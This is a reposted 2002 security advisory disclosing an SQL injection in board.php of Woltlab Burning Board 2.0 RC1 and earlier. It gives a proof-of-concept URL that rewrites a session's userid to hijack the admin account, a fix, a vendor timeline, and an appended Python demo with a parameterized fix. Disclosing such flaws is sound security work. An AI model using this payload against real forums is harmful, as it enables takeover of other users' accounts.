NI3
11-02-2003, 12:51 PM
Subject: sql injection vulnerability in WBB 2.0 RC1 and below
Date: Sep 8 2002 1:56PM
Author: Cano2

Hi,
I discovered a serious vulnerability in Woltlab Burning Board 2.0 RC 1
and below some weeks ago. The latest version (WBB 2.0 RC 2) does not seem
to be vulnerable, but there are still sites using vulnerable versions.

[versions tested vulnerable]
WBB 2.0 RC 1
WBB 2.0 beta 5
WBB 2.0 beta 4
WBB 2.0 beta 3

[description]
It allows any user (even guests, may depend
on configuration) to compromise every other account (the Administrator's
too). It's caused by a variable containing unchecked user input
in board.php, which can be used for an SQL injection attack.

The query looks similar to the following:

UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri = '$[Only registered and activated users can see links]'',
boardid = '$boardid', threadid = 'xx' WHERE hash = '$sid'

Because the content of $boardid is not checked, it's possible to
overwrite other fields in the table.

[proof of concept]
board.php?boardid=[boardid]%27,%20userid=%27[victim's userid, 1 is usually an admin]&sid=[attacker's session-id]

The executed query now looks like that:

UPDATE LOW_PRIORITY bb1_sessions SET lastactivity = 'xxx', request_uri =
'board.php?boardid=[boardid]%27,%20userid=%27[desired userid, 1 is usually always admin]&sid=[session-id]',
boardid = '[boardid]', userid='[desired userid, 1 is usually always admin]',
threadid = 'xx' WHERE hash = '$sid'

As you can see, the userid of the attacker's session is overwritten
with the victim's.

[solution]
Update to the latest version (WBB 2.0 RC2) or check every variable
possibly containing user input.

e.g.

$boardid = mysql_escape_string($boardid);

[vendor status]
29.7.02 contacted Woltlab
12.8.02 release of WBB 2.0 RC 2 (seems not vulnerable)

I didn't get an answer from Woltlab until now.
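The following is an added illustration, not code from the advisory or from Woltlab: it rebuilds the session UPDATE described above against a constructed in-memory SQLite table (table and column names taken from the advisory, everything else assumed), shows how the unchecked $boardid rewrites the attacker's own session's userid, and shows that binding parameters and validating boardid as an integer stops it.

```python
import sqlite3
from urllib.parse import quote, unquote

# Constructed payload from the advisory's proof of concept: PHP hands the
# decoded value to $boardid, while request_uri keeps the URL-encoded form.
ATTACK_BOARDID = "1', userid='1"
ATTACK_REQUEST_URI = "board.php?boardid=" + quote(ATTACK_BOARDID, safe="") + "&sid=attacker-sid"

def make_db():
    # Minimal bb1_sessions table with two constructed rows: the attacker's
    # session (userid 42) and an admin session (userid 1).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE bb1_sessions (hash TEXT, userid INTEGER, boardid TEXT, "
               "threadid TEXT, request_uri TEXT, lastactivity TEXT)")
    db.execute("INSERT INTO bb1_sessions VALUES ('attacker-sid', 42, '1', '', '', '')")
    db.execute("INSERT INTO bb1_sessions VALUES ('admin-sid', 1, '1', '', '', '')")
    db.commit()
    return db

def update_session_vulnerable(db, sid, boardid, request_uri):
    # Mirrors the advisory's query: $boardid is interpolated unchecked, so a
    # value containing a quote can add "userid=..." to the SET list.
    sql = ("UPDATE bb1_sessions SET lastactivity = 'xxx', request_uri = '%s', "
           "boardid = '%s', threadid = 'xx' WHERE hash = '%s'" % (request_uri, boardid, sid))
    db.execute(sql)
    db.commit()

def update_session_fixed(db, sid, boardid, request_uri):
    # Hardened form: boardid must be an integer, and every value is bound as a
    # parameter so it can never change the shape of the statement.
    if not str(boardid).isdigit():
        return False
    db.execute("UPDATE bb1_sessions SET lastactivity = ?, request_uri = ?, boardid = ?, "
               "threadid = ? WHERE hash = ?", ("xxx", request_uri, str(boardid), "xx", sid))
    db.commit()
    return True

def session_row(db, sid):
    # Returns (userid, boardid) for a session hash.
    return db.execute("SELECT userid, boardid FROM bb1_sessions WHERE hash = ?", (sid,)).fetchone()

if __name__ == "__main__":
    db = make_db()
    update_session_vulnerable(db, "attacker-sid", unquote(quote(ATTACK_BOARDID)), ATTACK_REQUEST_URI)
    print("vulnerable:", session_row(db, "attacker-sid"))   # userid becomes 1
    db = make_db()
    print("fixed accepted payload:", update_session_fixed(db, "attacker-sid", ATTACK_BOARDID, ATTACK_REQUEST_URI))
    print("fixed:", session_row(db, "attacker-sid"))        # userid stays 42
```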